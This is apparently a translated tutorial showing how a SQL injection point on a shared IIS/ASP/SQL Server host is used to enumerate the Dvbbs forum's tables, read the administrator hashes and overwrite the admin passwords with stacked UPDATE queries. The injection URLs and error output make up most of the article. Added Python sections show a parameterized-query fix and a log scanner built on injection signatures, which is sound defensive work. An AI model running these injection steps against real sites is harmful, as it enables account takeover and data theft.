Editor's preface: I have not tested this article, and it rests on a lot of premises: that some other program exists on the same host, that it uses the same SQL Server database, and that this other program has an injection vulnerability. It has nothing to do with Dvbbs itself; it is only because the Dvbbs forum is open that its database structure and code are familiar to everyone. Taking administrator privileges is one step of the attack, and escalating privileges from there is another; if the database account is only SA, that is more trouble still. Because all of these conditions have to be assumed, nobody needs to be too nervous: the intrusion is presented under rather ideal conditions. Reducing security holes in programming is something every one of us programmers must pay attention to, and webmasters who combine several programs on one site should pay attention to security and to the integrity of each program. There have also been two or three incidents involving Dvbbs 7.0 SP2 that I know of, so everyone should upgrade and set permissions carefully. It is not that opening up a program is bad, but the more people use it, the more bugs are found; the more software there is, the more bugs. By comparison I prefer custom-developed programs, which are safer.

The latest version of Dvbbs is now 7.0 SP2. It has to be said that its security is already very high, so breaking it through its own scripts is difficult. But we can get at Dvbbs indirectly in other ways. The combination of IIS + ASP + SQL Server 2000 is now very common, and a website uses many ASP scripts, which inevitably have holes. If there is a SQL injection point on a host, and that host also runs the SQL version of Dvbbs, you can basically conclude: this forum is yours. Let's look at an example.

1. Determine the target. Suppose the following URL is vulnerable to SQL injection:
http://www.loveyou.com/type.asp?id=6

To test whether it can be injected, add a single quote after the 6:

http://www.loveyou.com/type.asp?id=6'

This returns the error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
Continue. First detect the system version:

http://www.loveyou.com/type.asp?id=(select @@version)--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.

It seems the latest SP4 patch has been applied.
Get the user of the current database connection:

http://www.loveyou.com/type.asp?id=(select user_name())--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'WebUser' to a column of data type int.

From the error message we get the current database user: WebUser
Get the name of the current database:

http://www.loveyou.com/type.asp?id=(select db_name())--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '01city' to a column of data type int.

From the error message we get the current database: 01city
Next, test the permissions. (Note: our purpose is to get the forum, not the system, so the database permissions are not very important to us.)

http://www.loveyou.com/Type.asp?id=(select is_srvrolemember)--

Returns an error message: the current record has been deleted. It seems the permissions are not very high. Carry on:

http://www.loveyou.com/type.asp?id=(s ... ('db_owner'))--

Displays normally, so the permission the connecting user holds on the database is db_owner (database owner): not the highest, but more than enough to manipulate data.
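Every probe in this section works only because type.asp builds its query by pasting the id value into the SQL text. As an added example, not code from the original article or from Dvbbs, here is that vulnerable pattern next to its fix, written in Python against an in-memory SQLite table (the table name, rows and column names are constructed stand-ins; the real schema behind type.asp is not given on the page). The `boolean_probe_leaks` check replays the kind of true/false condition the article appends to `id` and confirms that only the concatenated version behaves as an oracle, which makes it a useful regression test after the fix.

```python
import sqlite3

# Constructed sample data (not from the page): a stand-in for the site's
# "type" table that type.asp?id=... reads from.
ROWS = [(5, "news"), (6, "review"), (7, "download")]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE type (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO type VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern behind the article's type.asp: the request value is pasted
    straight into the SQL text, so anything after 'id=' becomes SQL."""
    sql = "SELECT id, name FROM type WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Validate the type the page expects, then bind the value as a parameter.
    The driver sends the value separately from the statement, so it can never
    be parsed as SQL; the int() check rejects junk before it reaches the DB."""
    try:
        id_value = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer, got %r" % raw_id) from None
    return conn.execute(
        "SELECT id, name FROM type WHERE id=?", (id_value,)
    ).fetchall()


def boolean_probe_leaks(lookup, conn):
    """Regression check for the true/false oracle the article relies on:
    return True if a condition appended to the id changes the page's result.
    A safe lookup either rejects the input or returns the same thing both times."""
    try:
        true_case = lookup(conn, "6 AND 4>(SELECT COUNT(*) FROM type)")
        false_case = lookup(conn, "6 AND 2>(SELECT COUNT(*) FROM type)")
    except ValueError:
        return False
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "0 OR 1=1"))   # every row
    print("oracle via concatenation:", boolean_probe_leaks(lookup_vulnerable, db))
    print("oracle via parameters:   ", boolean_probe_leaks(lookup_safe, db))
```

The `int()` check matters on its own: even with parameter binding, a value that is not an integer should be refused with a generic error rather than passed through to the database, so the server never returns an ODBC conversion message that tells the client what the query looked like.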
2. Get the table names in the database. All the Dvbbs tables live in the current database, 01city. First get the first table name:

http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))--

Returns:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.

OK, the first table name is address. Continue:

http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects whe ... us>0 and name not in('address'))--

Returns the second table name, admin. Keep going in the same way, submitting:

http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects w ... tatus>0 and name not in('address', 'admin', ...))--

and you get every table name in the current database. After a while the results are out, and the names look right: address, admin, bbslink, bbsnews, board, user ... Anyone can see these are the Dvbbs tables. Of course there are some other tables too; we ignore them. There is no need to guess field names: just open your own Dvbbs database and look. With the table names and the field names, isn't Dvbbs already under your control? But do not DROP TABLE; destruction is no good. Our goal is to practise technique and raise our level. Next, we go for the Dvbbs back end.

3. Enter the back end and obtain Dvbbs forum administrator privileges.
Let's see how many administrators there are in the back end:

http://www.loveyou.com/type.asp?id=6 and 4 ... sername) from admin)--

Returns the error: the current record has been deleted. So there are fewer than four administrators. Submit directly:

http://www.loveyou.com/type.asp?id=6 and 1 ... sername) from admin)--

Displays normally, so it seems there is only one administrator. Read the administrator's name:

http://www.loveyou.com/type.asp?id=(sele ... from admin)--

Out it comes: the administrator's back-end login name is 01city. Continue and read the administrator's back-end login password:

http://www.loveyou.com/type.asp?id=(sele ... from admin)--

Very smooth; the password is E7CC01BE0E33A273, an MD5 hash. Do you want to crack it? Don't bother; there is no need to break the MD5 at all. Back-end management uses cookie session authentication, so only a user who is a front-end administrator can enter back-end management; an ordinary user cannot, even if they know the back-end username and password. So we need the front-end administrator's username and password. That's easy: register a user on his forum and look at the management team. The front-end administrator is: admin
OK, get his password:

http://www.loveyou.com/Type.asp?id=(select userpassword from user where username='admin')--

Returns the front-end password of admin: E7CC01BE0E33A273, also MD5. We could now use cookie spoofing to manage it. But is there another way? Don't forget that we already have a certain amount of permission on its database. The clever reader may already have thought of it: right, UPDATE. Submit:

http://www.loveyou.com/type.asp?id=6;update user set userpa ... ' where username='admin';--

Normal return, so it should have executed successfully. Check:

http://www.loveyou.com/type.asp?id=(select userpassword ...)--

The return value is 49ba59abbe56e057: the password change succeeded. Note that this 16-character MD5 value was computed in advance; you have to know its plaintext password. Then we change the management password in the back end. First change the back-end user to the front-end user; submit:

http://www.loveyou.com/type.asp?id=6;update admin set ... where username='01city'

Check:

http://www.loveyou.com/type.asp?id=(select username from admin)--

Changed successfully: the back-end administrator is now admin. Next change the password; submit:

http://www.loveyou.com/type.asp?id=6;update admin set passw ...; where username='admin'

Check:

http://www.loveyou.com/Type.asp?id=(select password from admin)--

Changed successfully: the back-end administrator password is now 49ba59abbe56e057.

So far, Dvbbs has fallen completely. Log in to the front end as admin, then use the same password to enter the back end.

4. Summary. Taking control of Dvbbs this way is not too difficult. A penetration test like this also exposes how terrible a SQL injection attack is, and a virtual host running IIS + ASP + SQL Server 2000 is almost unable to resist it: as long as there is one SQL injection point on the host, Dvbbs faces disaster. In fact it is not hard to find such an injection point among the many website programs on a server. An old saying fits here: a dyke of a thousand miles collapses because of an ant hole. Therefore the best way to prevent this kind of attack is to strengthen the security of the program code. Security is a whole; any tiny mistake may have serious consequences.
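Beyond fixing the code, every probe in this walkthrough leaves a distinctive trace in the IIS log, and a host running several ASP programs against one SQL Server is exactly where such log review pays off. The following scanner is an added example, not part of the original article: the W3C-format log lines are constructed, the `NUMERIC_PARAMS` allowlist is an assumption about which parameters should only ever carry an integer, and the signature list covers just the constructs used above (@@version, user_name()/db_name()/is_srvrolemember()/is_member(), sysobjects, inline subqueries and stacked UPDATE statements).

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the page); the requests mirror the
# probes the article sends to type.asp, followed by an unrelated request.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-06-01 10:00:01 10.0.0.5 GET /type.asp id=6 200
2004-06-01 10:00:03 10.0.0.5 GET /type.asp id=6' 500
2004-06-01 10:00:07 10.0.0.5 GET /type.asp id=(select+@@version)-- 500
2004-06-01 10:00:11 10.0.0.5 GET /type.asp id=(select+user_name())-- 500
2004-06-01 10:00:15 10.0.0.5 GET /type.asp id=(select+top+1+name+from+sysobjects+where+xtype='u')-- 500
2004-06-01 10:00:30 10.0.0.5 GET /type.asp id=6;update+admin+set+password='x'+where+username='admin';-- 200
2004-06-01 10:01:00 10.0.0.9 GET /index.asp - 200
"""

# Assumption: parameters that should only ever carry an integer. Anything else
# in them is suspicious regardless of whether a known signature matches.
NUMERIC_PARAMS = {("/type.asp", "id")}

# Signatures for the constructs used in the walkthrough, matched against the
# URL-decoded, lower-cased parameter value.
SIGNATURES = [
    ("server version probe", re.compile(r"@@version")),
    ("sql metadata function",
     re.compile(r"\b(user_name|db_name|is_srvrolemember|is_member)\s*\(")),
    ("system catalog access", re.compile(r"\bsys(objects|columns)\b")),
    ("stacked statement", re.compile(r";\s*(update|insert|delete|drop|exec)\b")),
    ("inline subquery", re.compile(r"\(\s*select\b")),
]


def parse_query(raw_query):
    """Split a logged cs-uri-query into decoded (name, value) pairs.
    IIS writes '-' when there is no query string."""
    if raw_query == "-":
        return []
    pairs = []
    for chunk in raw_query.split("&"):
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_iis_log(text):
    """Return (line_no, client_ip, parameter, rule) for every suspicious
    parameter value in a W3C extended log with the field order used above."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) != 7:
            continue  # not the field layout we expect; skip rather than guess
        _date, _time, client, _method, stem, query, _status = fields
        for name, value in parse_query(query):
            lowered = value.lower()
            if ((stem.lower(), name.lower()) in NUMERIC_PARAMS
                    and not lowered.strip().isdigit()):
                findings.append((line_no, client, name,
                                 "non-numeric value for numeric parameter"))
            for rule, pattern in SIGNATURES:
                if pattern.search(lowered):
                    findings.append((line_no, client, name, rule))
    return findings


def clients_to_review(findings, threshold=3):
    """Client addresses with at least `threshold` findings, for triage."""
    counts = {}
    for _line, client, _param, _rule in findings:
        counts[client] = counts.get(client, 0) + 1
    return sorted(c for c, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print("line %d %s %s: %s" % hit)
    print("review:", clients_to_review(scan_iis_log(SAMPLE_LOG)))
```

The numeric-parameter rule is the one worth keeping even if the signatures age: the single-quote test on the second request matches no SQL keyword at all, yet it is caught because `id` should never contain anything but digits. The 500 status on the same lines is a second, independent signal that the ODBC error text reached the client.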